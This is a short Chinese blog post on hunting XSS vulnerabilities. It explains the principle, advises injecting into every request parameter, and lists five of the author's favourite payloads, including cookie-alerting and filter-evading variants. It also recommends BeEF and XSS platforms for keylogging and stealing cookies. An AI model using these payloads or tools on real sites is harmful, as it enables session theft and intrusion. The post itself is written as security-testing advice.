返回顶部

说好的见框就插呢?

 


作者:@Xuno
本文为作者原创,转载请注明出处:https://www.cnblogs.com/MaoheLaoXu/p/17562130.html


背景

每一个学安全的,都听说过一句话,挖XSS就是见框就插,不得不说这个方法很有用,但是经常遇到插不进去的情况。今天浅聊一下XSS漏洞
在这里插入图片描述

一句话讲原理

XSS原理和注入很像,核心也是用户输入的数据被当作代码执行了,一个是插入了数据库语句,一个是插入了JS语句

速挖XSS

(1)基础方法:

见框就插的原理是因为,http传参通常是通过这种方法传参的,本质是通过参数去传入xss语句,所以我们抓包对所有有参数的地方进行xss语句拼接会发现更多以前没发现的点

在这里插入图片描述
可以一个个插入恶意语句试试

(2)个人常用语句

每一个都很好用!

\u201c\u003e\u003cimg src=1 onerror=alert(document.cookie)\u003e
<img src=1 onerror=alert(document.cookie)>
%22onclick=prompt+1
1;{onerror=alert}throw 1337
"><img src=1 onerror = top['ale'+'rt'](1)>

(3)利用工具

分享个人经常使用的利用工具,可以屏幕截图,键盘记录,偷取cookie等操作

kali自带的beefxss工具很好用!
在这里插入图片描述
在这里插入图片描述

xss平台也很不错!
在这里插入图片描述



如果您觉得阅读本文对您有帮助,请点一下“推荐”按钮,您的“推荐”将是我最大的写作动力!欢迎各位转载,但是未经作者本人同意,转载文章之后必须在文章页面明显位置给出作者和原文连接,否则保留追究法律责任的权利。
posted @   Xuno  阅读(29)  评论(0编辑  收藏  举报
努力加载评论中...
点击右上角即可分享
微信分享提示